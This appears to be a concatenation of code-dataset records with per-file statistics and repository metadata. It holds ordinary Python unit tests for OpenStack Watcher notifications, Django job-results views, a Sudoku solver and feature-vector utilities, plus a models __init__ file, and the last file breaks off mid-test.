def test_send_action_execution(self):
action = utils.create_test_action(
mock.Mock(), state=objects.action.State.PENDING,
action_type='nop', input_parameters={'param1': 1, 'param2': 2},
parents=[], action_plan_id=self.action_plan.id)
notifications.action.send_execution_notification(
mock.MagicMock(), action, 'execution', phase='start', host='node0')
# The 1st notification is because we created the audit object.
# The 2nd notification is because we created the action plan object.
self.assertEqual(4, self.m_notifier.info.call_count)
notification = self.m_notifier.info.call_args[1]
self.assertEqual("infra-optim:node0", self.m_notifier.publisher_id)
self.assertDictEqual(
{
'event_type': 'action.execution.start',
'payload': {
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.0',
'watcher_object.name': 'ActionExecutionPayload',
'watcher_object.data': {
'uuid': '10a47dd1-4874-4298-91cf-eff046dbdb8d',
'input_parameters': {
'param2': 2,
'param1': 1
},
'created_at': '2016-10-18T09:52:05Z',
'fault': None,
'updated_at': None,
'state': 'PENDING',
'action_plan': {
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.1',
'watcher_object.name': 'TerseActionPlanPayload',
'watcher_object.data': {
'uuid': '76be87bd-3422-43f9-93a0-e85a577e3061',
'global_efficacy': [],
'created_at': '2016-10-18T09:52:05Z',
'updated_at': None,
'state': 'ONGOING',
'audit_uuid': '10a47dd1-4874-4298'
'-91cf-eff046dbdb8d',
'strategy_uuid': 'cb3d0b58-4415-4d90'
'-b75b-1e96878730e3',
'deleted_at': None
}
},
'parents': [],
'action_type': 'nop',
'deleted_at': None
}
}
},
notification
)
def test_send_action_execution_with_error(self):
action = utils.create_test_action(
mock.Mock(), state=objects.action.State.FAILED,
action_type='nop', input_parameters={'param1': 1, 'param2': 2},
parents=[], action_plan_id=self.action_plan.id)
try:
# This is to load the exception in sys.exc_info()
raise exception.WatcherException("TEST")
except exception.WatcherException:
notifications.action.send_execution_notification(
mock.MagicMock(), action, 'execution', phase='error',
host='node0', priority='error')
self.assertEqual(1, self.m_notifier.error.call_count)
notification = self.m_notifier.error.call_args[1]
self.assertEqual("infra-optim:node0", self.m_notifier.publisher_id)
self.assertDictEqual(
{
'event_type': 'action.execution.error',
'payload': {
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.0',
'watcher_object.name': 'ActionExecutionPayload',
'watcher_object.data': {
'uuid': '10a47dd1-4874-4298-91cf-eff046dbdb8d',
'input_parameters': {
'param2': 2,
'param1': 1
},
'created_at': '2016-10-18T09:52:05Z',
'fault': {
'watcher_object.data': {
'exception': u'WatcherException',
'exception_message': u'TEST',
'function_name': (
'test_send_action_execution_with_error'),
'module_name': (
'watcher.tests.notifications.'
'test_action_notification')
},
'watcher_object.name': 'ExceptionPayload',
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.0'
},
'updated_at': None,
'state': 'FAILED',
'action_plan': {
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.1',
'watcher_object.name': 'TerseActionPlanPayload',
'watcher_object.data': {
'uuid': '76be87bd-3422-43f9-93a0-e85a577e3061',
'global_efficacy': [],
'created_at': '2016-10-18T09:52:05Z',
'updated_at': None,
'state': 'ONGOING',
'audit_uuid': '10a47dd1-4874-4298'
'-91cf-eff046dbdb8d',
'strategy_uuid': 'cb3d0b58-4415-4d90'
'-b75b-1e96878730e3',
'deleted_at': None
}
},
'parents': [],
'action_type': 'nop',
'deleted_at': None
}
}
},
notification
)
def test_send_action_cancel(self):
action = utils.create_test_action(
mock.Mock(), state=objects.action.State.PENDING,
action_type='nop', input_parameters={'param1': 1, 'param2': 2},
parents=[], action_plan_id=self.action_plan.id)
notifications.action.send_cancel_notification(
mock.MagicMock(), action, 'cancel', phase='start', host='node0')
# The 1st notification is because we created the audit object.
# The 2nd notification is because we created the action plan object.
self.assertEqual(4, self.m_notifier.info.call_count)
notification = self.m_notifier.info.call_args[1]
self.assertEqual("infra-optim:node0", self.m_notifier.publisher_id)
self.assertDictEqual(
{
'event_type': 'action.cancel.start',
'payload': {
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.0',
'watcher_object.name': 'ActionCancelPayload',
'watcher_object.data': {
'uuid': '10a47dd1-4874-4298-91cf-eff046dbdb8d',
'input_parameters': {
'param2': 2,
'param1': 1
},
'created_at': '2016-10-18T09:52:05Z',
'fault': None,
'updated_at': None,
'state': 'PENDING',
'action_plan': {
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.1',
'watcher_object.name': 'TerseActionPlanPayload',
'watcher_object.data': {
'uuid': '76be87bd-3422-43f9-93a0-e85a577e3061',
'global_efficacy': [],
'created_at': '2016-10-18T09:52:05Z',
'updated_at': None,
'state': 'ONGOING',
'audit_uuid': '10a47dd1-4874-4298'
'-91cf-eff046dbdb8d',
'strategy_uuid': 'cb3d0b58-4415-4d90'
'-b75b-1e96878730e3',
'deleted_at': None
}
},
'parents': [],
'action_type': 'nop',
'deleted_at': None
}
}
},
notification
)
def test_send_action_cancel_with_error(self):
action = utils.create_test_action(
mock.Mock(), state=objects.action.State.FAILED,
action_type='nop', input_parameters={'param1': 1, 'param2': 2},
parents=[], action_plan_id=self.action_plan.id)
try:
# This is to load the exception in sys.exc_info()
raise exception.WatcherException("TEST")
except exception.WatcherException:
notifications.action.send_cancel_notification(
mock.MagicMock(), action, 'cancel', phase='error',
host='node0', priority='error')
self.assertEqual(1, self.m_notifier.error.call_count)
notification = self.m_notifier.error.call_args[1]
self.assertEqual("infra-optim:node0", self.m_notifier.publisher_id)
self.assertDictEqual(
{
'event_type': 'action.cancel.error',
'payload': {
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.0',
'watcher_object.name': 'ActionCancelPayload',
'watcher_object.data': {
'uuid': '10a47dd1-4874-4298-91cf-eff046dbdb8d',
'input_parameters': {
'param2': 2,
'param1': 1
},
'created_at': '2016-10-18T09:52:05Z',
'fault': {
'watcher_object.data': {
'exception': u'WatcherException',
'exception_message': u'TEST',
'function_name': (
'test_send_action_cancel_with_error'),
'module_name': (
'watcher.tests.notifications.'
'test_action_notification')
},
'watcher_object.name': 'ExceptionPayload',
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.0'
},
'updated_at': None,
'state': 'FAILED',
'action_plan': {
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.1',
'watcher_object.name': 'TerseActionPlanPayload',
'watcher_object.data': {
'uuid': '76be87bd-3422-43f9-93a0-e85a577e3061',
'global_efficacy': [],
'created_at': '2016-10-18T09:52:05Z',
'updated_at': None,
'state': 'ONGOING',
'audit_uuid': '10a47dd1-4874-4298'
'-91cf-eff046dbdb8d',
'strategy_uuid': 'cb3d0b58-4415-4d90'
'-b75b-1e96878730e3',
'deleted_at': None
}
},
'parents': [],
'action_type': 'nop',
'deleted_at': None
}
}
},
notification
)
| 46.176955
| 79
| 0.454639
| 1,800
| 22,442
| 5.470556
| 0.114444
| 0.089774
| 0.031685
| 0.050066
| 0.84249
| 0.820453
| 0.818016
| 0.818016
| 0.814055
| 0.814055
| 0
| 0.074653
| 0.441315
| 22,442
| 485
| 80
| 46.272165
| 0.710719
| 0.052224
| 0
| 0.712963
| 0
| 0
| 0.258496
| 0.08251
| 0
| 0
| 0
| 0
| 0.050926
| 1
| 0.023148
| false
| 0
| 0.020833
| 0
| 0.048611
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0ca6e76784d8cc4d7fc179379ebb67bbcb000548
| 5,945
|
py
|
Python
|
vol/test_views.py
|
volCommunity/vol-django
|
06c625f1cb2ca4b619dfcfa04a9ded445600ad7f
|
[
"Apache-2.0"
] | 5
|
2017-10-11T03:40:07.000Z
|
2018-07-09T12:30:13.000Z
|
vol/test_views.py
|
volCommunity/vol-django
|
06c625f1cb2ca4b619dfcfa04a9ded445600ad7f
|
[
"Apache-2.0"
] | 105
|
2017-09-28T00:41:00.000Z
|
2021-06-01T21:26:03.000Z
|
vol/test_views.py
|
volCommunity/vol-django
|
06c625f1cb2ca4b619dfcfa04a9ded445600ad7f
|
[
"Apache-2.0"
] | 3
|
2017-10-26T22:53:51.000Z
|
2017-11-01T18:43:22.000Z
|
from django.core.urlresolvers import reverse
from django.test import TransactionTestCase
from vol.factories import LabelsFactory, JobFactory
class IndexViewTests(TransactionTestCase):
    """Tests for the index (landing) page."""

    def _get_index(self, use_https):
        """Fetch the index view over HTTP or HTTPS."""
        return self.client.get(reverse('index'), secure=use_https)

    def test_index_insecure_redirects(self):
        """A plain-HTTP request is permanently redirected to HTTPS."""
        self.assertEqual(301, self._get_index(False).status_code)

    def test_index_view(self):
        """An HTTPS request renders the index page successfully."""
        self.assertEqual(200, self._get_index(True).status_code)
class ResultsViewTests(TransactionTestCase):
    """Tests for the results view job/label matching counters."""

    def _assert_counts(self, response, total, match, interests, location):
        """Assert the match counters exposed in the response context.

        Also checks that the page rendered successfully (HTTP 200).
        """
        self.assertEqual(response.status_code, 200)
        context = response.context[0]
        self.assertEqual(context['total_job_count'], total)
        self.assertEqual(context['match_count'], match)
        self.assertEqual(context['interests_matches_count'], interests)
        self.assertEqual(context['location_matches_count'], location)

    def test_get_results_none(self):
        """No jobs at all: every counter is zero."""
        response = self.client.get('/results/Nonesense/Nonesense', secure=True)
        self._assert_counts(response, total=0, match=0, interests=0,
                            location=0)

    def test_get_results_one_complete_match(self):
        """One job matching both the location and the interest label."""
        label = LabelsFactory(name="nature")
        job = JobFactory()
        job.labels.add(label.id)
        response = self.client.get('/results/wellington/nature', secure=True)
        self._assert_counts(response, total=1, match=1, interests=1,
                            location=1)

    def test_get_results_one_location_only(self):
        """One job matching the location but not the interest label."""
        label = LabelsFactory()
        job = JobFactory()
        job.labels.add(label.id)
        response = self.client.get('/results/wellington/Nature', secure=True)
        self._assert_counts(response, total=1, match=1, interests=0,
                            location=1)

    def test_get_results_one_label_only(self):
        """One job matching the interest label but not the location."""
        label = LabelsFactory(name="nature")
        job = JobFactory(city="Dunedin")
        job.labels.add(label.id)
        response = self.client.get('/results/wellington/nature', secure=True)
        self._assert_counts(response, total=1, match=0, interests=1,
                            location=0)

    def test_get_results_many(self):
        """Two jobs, both matching location and label."""
        label = LabelsFactory(name="nature")
        job_one = JobFactory()
        job_one.labels.add(label.id)
        job_two = JobFactory(title="Butterfly catcher",
                             url="http://www.example.com/")
        job_two.labels.add(label.id)
        response = self.client.get('/results/wellington/nature', secure=True)
        self._assert_counts(response, total=2, match=2, interests=2,
                            location=2)

    def test_get_results_many_complete_match(self):
        # NOTE(review): identical setup and expectations to
        # test_get_results_many — presumably one of the two was meant to
        # differ; confirm before consolidating.
        label = LabelsFactory(name="nature")
        job_one = JobFactory()
        job_one.labels.add(label.id)
        job_two = JobFactory(title="Butterfly catcher",
                             url="http://www.example.com/")
        job_two.labels.add(label.id)
        response = self.client.get('/results/wellington/nature', secure=True)
        self._assert_counts(response, total=2, match=2, interests=2,
                            location=2)

    def test_get_results_many_location_only(self):
        """Two jobs matching only the location."""
        JobFactory()
        JobFactory(title="Butterfly catcher",
                   url="http://www.example.com/")
        response = self.client.get('/results/wellington/nature', secure=True)
        # NOTE(review): match_count == 2 even though no label matches —
        # verify this is the intended semantics of 'match_count'.
        self._assert_counts(response, total=2, match=2, interests=0,
                            location=2)

    def test_get_results_many_label_only(self):
        """Two jobs matching only the interest label."""
        label = LabelsFactory(name="nature")
        job_one = JobFactory(city="Dunedin")
        job_one.labels.add(label.id)
        job_two = JobFactory(title="Butterfly catcher",
                             city="Amsterdam")
        job_two.labels.add(label.id)
        response = self.client.get('/results/wellington/nature', secure=True)
        self._assert_counts(response, total=2, match=0, interests=2,
                            location=0)
class JobViewTests(TransactionTestCase):
    """Tests for the job detail view."""

    def test_get_job_none(self):
        """Requesting an unknown job slug yields a 404."""
        missing = '/jobs/028b7d48-3691-459e-93c3-5cd147a92dfd'
        resp = self.client.get(missing, secure=True)
        self.assertEqual(resp.status_code, 404)

    def test_get_job_one(self):
        """An existing job's page exposes that job in its context."""
        job = JobFactory()
        resp = self.client.get('/jobs/{}'.format(job.slug), secure=True)
        self.assertEqual(resp.context[0]['job'], job)
| 43.07971
| 93
| 0.681918
| 714
| 5,945
| 5.501401
| 0.119048
| 0.168024
| 0.257637
| 0.252037
| 0.861762
| 0.844196
| 0.82943
| 0.792515
| 0.730143
| 0.717159
| 0
| 0.024809
| 0.186375
| 5,945
| 137
| 94
| 43.394161
| 0.787265
| 0.006728
| 0
| 0.67619
| 0
| 0
| 0.174657
| 0.103676
| 0
| 0
| 0
| 0
| 0.419048
| 1
| 0.114286
| false
| 0
| 0.028571
| 0
| 0.171429
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
0cca986ef8ce8b81444e34bedf8a15f55487b9ee
| 6,866
|
py
|
Python
|
tests/test_sudoku_pytest.py
|
nikhil642002/playground
|
f86276e4252c8c4eba9798157954a1502543faa9
|
[
"MIT"
] | null | null | null |
tests/test_sudoku_pytest.py
|
nikhil642002/playground
|
f86276e4252c8c4eba9798157954a1502543faa9
|
[
"MIT"
] | null | null | null |
tests/test_sudoku_pytest.py
|
nikhil642002/playground
|
f86276e4252c8c4eba9798157954a1502543faa9
|
[
"MIT"
] | 1
|
2020-10-01T12:54:51.000Z
|
2020-10-01T12:54:51.000Z
|
import Sudoku
# Marker for a blank cell: presumably the list of candidate digits 1..9
# the solver may place there (TODO confirm against Sudoku.main).
# list(range(...)) replaces the redundant identity comprehension.
i = list(range(1, 10))
# def template():
# input = [[i, i, i, i, i, i, i, i, i], # Template
# [i, i, i, i, i, i, i, i, i],
# [i, i, i, i, i, i, i, i, i],
# [i, i, i, i, i, i, i, i, i],
# [i, i, i, i, i, i, i, i, i],
# [i, i, i, i, i, i, i, i, i],
# [i, i, i, i, i, i, i, i, i],
# [i, i, i, i, i, i, i, i, i],
# [i, i, i, i, i, i, i, i, i]]
# assert sudoku.main(input) == [[6, 5, 8, 3, 4, 1, 2, 7, 9],
# [9, 3, 1, 2, 7, 6, 8, 4, 5],
# [2, 7, 4, 8, 9, 5, 3, 1, 6],
# [7, 2, 5, 1, 3, 9, 6, 8, 4],
# [4, 1, 9, 6, 8, 2, 7, 5, 3],
# [3, 8, 6, 7, 5, 4, 9, 2, 1],
# [1, 4, 2, 9, 6, 7, 5, 3, 8],
# [5, 6, 3, 4, 2, 8, 1, 9, 7],
# [8, 9, 7, 5, 1, 3, 4, 6, 2]]
def test_anti_brute_force():
    """Solve a puzzle crafted to be slow for naive brute-force solvers."""
    # 'puzzle' avoids shadowing the builtin ``input``; the module-level
    # ``i`` marks a blank cell.
    puzzle = [[i, i, i, i, i, i, i, i, i],
              [i, i, i, i, i, 3, i, 8, 5],
              [i, i, 1, i, 2, i, i, i, i],
              [i, i, i, 5, i, 7, i, i, i],
              [i, i, 4, i, i, i, 1, i, i],
              [i, 9, i, i, i, i, i, i, i],
              [5, i, i, i, i, i, i, 7, 3],
              [i, i, 2, i, 1, i, i, i, i],
              [i, i, i, i, 4, i, i, i, 9]]
    assert Sudoku.main(puzzle) == [[9, 8, 7, 6, 5, 4, 3, 2, 1],
                                   [2, 4, 6, 1, 7, 3, 9, 8, 5],
                                   [3, 5, 1, 9, 2, 8, 7, 4, 6],
                                   [1, 2, 8, 5, 3, 7, 6, 9, 4],
                                   [6, 3, 4, 8, 9, 2, 1, 5, 7],
                                   [7, 9, 5, 4, 6, 1, 8, 3, 2],
                                   [5, 1, 9, 2, 8, 6, 4, 7, 3],
                                   [4, 7, 2, 3, 1, 9, 5, 6, 8],
                                   [8, 6, 3, 7, 4, 5, 2, 1, 9]]
def test_easy():
    """Solve an easy puzzle."""
    # 'puzzle' avoids shadowing the builtin ``input``; the module-level
    # ``i`` marks a blank cell.
    puzzle = [[5, 3, i, i, 7, i, i, i, i],
              [6, i, i, 1, 9, 5, i, i, i],
              [i, 9, 8, i, i, i, i, 6, i],
              [8, i, i, i, 6, i, i, i, 3],
              [4, i, i, 8, i, 3, i, i, 1],
              [7, i, i, i, 2, i, i, i, 6],
              [i, 6, i, i, i, i, 2, 8, i],
              [i, i, i, 4, 1, 9, i, i, 5],
              [i, i, i, i, 8, i, i, 7, 9]]
    assert Sudoku.main(puzzle) == [[5, 3, 4, 6, 7, 8, 9, 1, 2],
                                   [6, 7, 2, 1, 9, 5, 3, 4, 8],
                                   [1, 9, 8, 3, 4, 2, 5, 6, 7],
                                   [8, 5, 9, 7, 6, 1, 4, 2, 3],
                                   [4, 2, 6, 8, 5, 3, 7, 9, 1],
                                   [7, 1, 3, 9, 2, 4, 8, 5, 6],
                                   [9, 6, 1, 5, 3, 7, 2, 8, 4],
                                   [2, 8, 7, 4, 1, 9, 6, 3, 5],
                                   [3, 4, 5, 2, 8, 6, 1, 7, 9]]
def test_hard1():
    """Solve a hard puzzle (variant 1)."""
    # 'puzzle' avoids shadowing the builtin ``input``; the module-level
    # ``i`` marks a blank cell.
    puzzle = [[i, 2, i, i, 1, i, 9, i, i],
              [7, i, i, i, 8, i, i, i, 2],
              [i, 5, 8, i, i, i, i, 6, i],
              [i, i, i, 5, i, i, i, i, 3],
              [i, 6, i, 1, i, 2, i, 7, i],
              [1, i, i, i, i, 8, i, i, i],
              [i, 9, i, i, i, i, 2, 4, i],
              [3, i, i, i, 4, i, i, i, 9],
              [i, i, 1, i, 5, i, i, 8, i]]
    assert Sudoku.main(puzzle) == [[4, 2, 3, 6, 1, 7, 9, 5, 8],
                                   [7, 1, 6, 9, 8, 5, 4, 3, 2],
                                   [9, 5, 8, 4, 2, 3, 7, 6, 1],
                                   [2, 8, 7, 5, 6, 4, 1, 9, 3],
                                   [5, 6, 9, 1, 3, 2, 8, 7, 4],
                                   [1, 3, 4, 7, 9, 8, 6, 2, 5],
                                   [8, 9, 5, 3, 7, 1, 2, 4, 6],
                                   [3, 7, 2, 8, 4, 6, 5, 1, 9],
                                   [6, 4, 1, 2, 5, 9, 3, 8, 7]]
def test_hard2():
    """Solve a hard puzzle (variant 2)."""
    # 'puzzle' avoids shadowing the builtin ``input``; the module-level
    # ``i`` marks a blank cell.
    puzzle = [[1, 3, 5, i, i, i, i, 7, 8],
              [i, i, i, i, 4, i, i, i, i],
              [i, 8, i, i, i, i, i, i, 2],
              [4, i, i, 6, 2, i, i, i, i],
              [6, i, 7, 3, i, 4, 2, i, 5],
              [i, i, i, i, 9, 5, i, i, 4],
              [8, i, i, i, i, i, i, 9, i],
              [i, i, i, i, 1, i, i, i, i],
              [2, 1, i, i, i, i, 8, 4, 3]]
    assert Sudoku.main(puzzle) == [[1, 3, 5, 2, 6, 9, 4, 7, 8],
                                   [7, 6, 2, 8, 4, 3, 1, 5, 9],
                                   [9, 8, 4, 1, 5, 7, 3, 6, 2],
                                   [4, 5, 8, 6, 2, 1, 9, 3, 7],
                                   [6, 9, 7, 3, 8, 4, 2, 1, 5],
                                   [3, 2, 1, 7, 9, 5, 6, 8, 4],
                                   [8, 7, 6, 4, 3, 2, 5, 9, 1],
                                   [5, 4, 3, 9, 1, 8, 7, 2, 6],
                                   [2, 1, 9, 5, 7, 6, 8, 4, 3]]
def test_hard3():
    """Solve a hard puzzle (variant 3)."""
    # 'puzzle' avoids shadowing the builtin ``input``; the module-level
    # ``i`` marks a blank cell.
    puzzle = [[6, i, i, 3, 4, i, i, 7, i],
              [i, 3, i, 2, i, 6, i, i, i],
              [2, i, 4, i, 9, i, i, 1, i],
              [7, i, 5, i, i, i, i, 8, i],
              [i, i, i, i, i, i, i, i, i],
              [i, 8, i, i, i, i, 9, i, 1],
              [i, 4, i, i, 6, i, 5, i, 8],
              [i, i, i, 4, i, 8, i, 9, i],
              [i, 9, i, i, 1, 3, i, i, 2]]
    assert Sudoku.main(puzzle) == [[6, 5, 8, 3, 4, 1, 2, 7, 9],
                                   [9, 3, 1, 2, 7, 6, 8, 4, 5],
                                   [2, 7, 4, 8, 9, 5, 3, 1, 6],
                                   [7, 2, 5, 1, 3, 9, 6, 8, 4],
                                   [4, 1, 9, 6, 8, 2, 7, 5, 3],
                                   [3, 8, 6, 7, 5, 4, 9, 2, 1],
                                   [1, 4, 2, 9, 6, 7, 5, 3, 8],
                                   [5, 6, 3, 4, 2, 8, 1, 9, 7],
                                   [8, 9, 7, 5, 1, 3, 4, 6, 2]]
def test_other():
    """Solve a puzzle that encodes blanks as 0 instead of ``i``.

    NOTE(review): unlike the other tests this grid uses 0 for empty
    cells — presumably Sudoku.main accepts both encodings; confirm.
    """
    # 'puzzle' avoids shadowing the builtin ``input``.
    puzzle = [[0, 0, 0, 9, 0, 0, 8, 0, 0],
              [0, 0, 4, 0, 1, 7, 0, 0, 9],
              [0, 0, 7, 0, 0, 4, 0, 0, 0],
              [0, 8, 0, 0, 4, 0, 9, 0, 1],
              [0, 1, 0, 0, 0, 0, 0, 5, 0],
              [7, 0, 5, 0, 2, 0, 0, 3, 0],
              [0, 0, 0, 5, 0, 0, 6, 0, 0],
              [3, 0, 0, 6, 8, 0, 7, 0, 0],
              [0, 0, 2, 0, 0, 1, 0, 0, 0]]
    assert Sudoku.main(puzzle) == [[5, 2, 1, 9, 3, 6, 8, 4, 7],
                                   [8, 3, 4, 2, 1, 7, 5, 6, 9],
                                   [9, 6, 7, 8, 5, 4, 1, 2, 3],
                                   [2, 8, 6, 3, 4, 5, 9, 7, 1],
                                   [4, 1, 3, 7, 6, 9, 2, 5, 8],
                                   [7, 9, 5, 1, 2, 8, 4, 3, 6],
                                   [1, 4, 8, 5, 7, 3, 6, 9, 2],
                                   [3, 5, 9, 6, 8, 2, 7, 1, 4],
                                   [6, 7, 2, 4, 9, 1, 3, 8, 5]]
| 45.470199
| 64
| 0.211914
| 1,203
| 6,866
| 1.202826
| 0.0266
| 0.353836
| 0.389772
| 0.392536
| 0.557015
| 0.416033
| 0.348307
| 0.319281
| 0.307533
| 0.25501
| 0
| 0.265874
| 0.571075
| 6,866
| 150
| 65
| 45.773333
| 0.225467
| 0.14215
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.051724
| 1
| 0.051724
| false
| 0
| 0.008621
| 0
| 0.060345
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
49066de616512e45cae038a1c2f13b997809f23e
| 77
|
py
|
Python
|
website/assets/models/__init__.py
|
JobDoesburg/landolfio
|
4cbf31c2e6f93745f5aa0d20893bf20f3acecc6e
|
[
"MIT"
] | 1
|
2021-02-24T14:33:09.000Z
|
2021-02-24T14:33:09.000Z
|
website/assets/models/__init__.py
|
JobDoesburg/landolfio
|
4cbf31c2e6f93745f5aa0d20893bf20f3acecc6e
|
[
"MIT"
] | 2
|
2022-01-13T04:03:38.000Z
|
2022-03-12T01:03:10.000Z
|
website/assets/models/__init__.py
|
JobDoesburg/landolfio
|
4cbf31c2e6f93745f5aa0d20893bf20f3acecc6e
|
[
"MIT"
] | null | null | null |
# Convenience re-exports: make everything defined in the asset model
# modules importable directly from ``assets.models``.
from assets.models.asset import *
from assets.models.asset_location import *
| 25.666667
| 42
| 0.818182
| 11
| 77
| 5.636364
| 0.545455
| 0.322581
| 0.516129
| 0.677419
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103896
| 77
| 2
| 43
| 38.5
| 0.898551
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
490689ef8ddc9c463a5d1978d3f426b0dc4382c9
| 5,361
|
py
|
Python
|
test/test_feature_vector_creation_utilities.py
|
jeffharwell/viewpointdiversity
|
a9734f47e09e9269632d99139e4b58f5a68f44e6
|
[
"MIT"
] | null | null | null |
test/test_feature_vector_creation_utilities.py
|
jeffharwell/viewpointdiversity
|
a9734f47e09e9269632d99139e4b58f5a68f44e6
|
[
"MIT"
] | null | null | null |
test/test_feature_vector_creation_utilities.py
|
jeffharwell/viewpointdiversity
|
a9734f47e09e9269632d99139e4b58f5a68f44e6
|
[
"MIT"
] | null | null | null |
import unittest
import numpy as np
from src.viewpointdiversitydetection.feature_vector_creation_utilities import create_has_sentiments_present_vector
from src.viewpointdiversitydetection.feature_vector_creation_utilities import create_word2vec_present_vector
from src.viewpointdiversitydetection.feature_vector_creation_utilities import combine_as_average, combine_as_average_np
class FeatureVectorCreationUtilitiesTest(unittest.TestCase):
    """Unit tests for the feature-vector creation utility functions."""

    def test_create_has_sentiments_present_vector(self):
        """create_has_sentiments_present_vector flags non-zero vectors.

        The result is a two-element indicator: 1 when the corresponding
        input vector has any non-zero component, 0 otherwise.
        """
        # assertEqual gives clearer failure output than assertTrue(a == b).
        v1 = [0.345, 0.655, 0, -0.3125, 0.6875, 0.345, 0.655, 0.0]
        v2 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
        self.assertEqual([1, 0], create_has_sentiments_present_vector(v1, v2))
        v1 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
        v2 = [0, 0.7695000000000001, 0.3073333333333333, 0.5,
              1.0, 0.0, 1.0, 0.375]
        self.assertEqual([0, 1], create_has_sentiments_present_vector(v1, v2))
        v1 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
        v2 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
        self.assertEqual([0, 0], create_has_sentiments_present_vector(v1, v2))
        v1 = [0.34, 0.66, 0, 0.2, 0.2, 0.34, 0.66, 0.0]
        v2 = [0.3415, 0.579, 0.159, 0.3125, 0.4625, 0.371, 0.629, 0.159]
        self.assertEqual([1, 1], create_has_sentiments_present_vector(v1, v2))

    def test_create_word2vec_present_vector(self):
        """create_word2vec_present_vector flags non-zero 300-d vectors."""
        # Dead list assignments that were immediately overwritten with
        # ndarrays have been removed.
        v1 = np.random.rand(300)
        v2 = np.zeros(300)
        self.assertEqual([1, 0], create_word2vec_present_vector(v1, v2))
        v1 = np.zeros(300)
        v2 = np.random.rand(300)
        self.assertEqual([0, 1], create_word2vec_present_vector(v1, v2))
        v1 = np.zeros(300)
        v2 = np.zeros(300)
        self.assertEqual([0, 0], create_word2vec_present_vector(v1, v2))
        v1 = np.random.rand(300)
        v2 = np.random.rand(300)
        self.assertEqual([1, 1], create_word2vec_present_vector(v1, v2))

    def test_combine_as_average(self):
        """combine_as_average averages two vectors element-wise.

        With include_zeros=False an all-zero vector is excluded from the
        average, so the non-zero vector is returned unchanged.
        """
        v1 = [0.345, 0.655, 0, -0.3125, 0.6875, 0.345, 0.655, 0.0]
        v2 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
        self.assertEqual(combine_as_average(v1, v2), list(np.divide(v1, 2.0)))
        self.assertEqual(combine_as_average(v1, v2, include_zeros=False), v1)
        v1 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
        v2 = [0, 0.7695000000000001, 0.3073333333333333, 0.5,
              1.0, 0.0, 1.0, 0.375]
        self.assertEqual(combine_as_average(v1, v2), list(np.divide(v2, 2.0)))
        self.assertEqual(combine_as_average(v1, v2, include_zeros=False), v2)
        v1 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
        v2 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
        self.assertEqual(combine_as_average(v1, v2), v1)
        self.assertEqual(combine_as_average(v1, v2, include_zeros=False), v1)
        v1 = [0.34, 0.66, 0, 0.2, 0.2, 0.34, 0.66, 0.0]
        v2 = [0.3415, 0.579, 0.159, 0.3125, 0.4625, 0.371, 0.629, 0.159]
        self.assertEqual(
            combine_as_average(v1, v2),
            list(np.divide(np.sum([np.array(v1), np.array(v2)], axis=0), 2)))

    def test_combine_as_average_np(self):
        """combine_as_average_np mirrors combine_as_average for ndarrays.

        BUG FIX: all but the first two assertions previously called the
        list-based combine_as_average instead of combine_as_average_np,
        so the numpy variant was largely untested.
        """
        v1 = np.array([0.345, 0.655, 0, -0.3125, 0.6875, 0.345, 0.655, 0.0])
        v2 = np.zeros(8)
        self.assertTrue(np.array_equal(combine_as_average_np(v1, v2),
                                       np.divide(v1, 2.0)))
        self.assertTrue(np.array_equal(
            combine_as_average_np(v1, v2, include_zeros=False), v1))
        v1 = np.zeros(8)
        v2 = np.array([0, 0.7695000000000001, 0.3073333333333333, 0.5,
                       1.0, 0.0, 1.0, 0.375])
        self.assertTrue(np.array_equal(combine_as_average_np(v1, v2),
                                       np.divide(v2, 2.0)))
        self.assertTrue(np.array_equal(
            combine_as_average_np(v1, v2, include_zeros=False), v2))
        v1 = np.zeros(8)
        v2 = np.zeros(8)
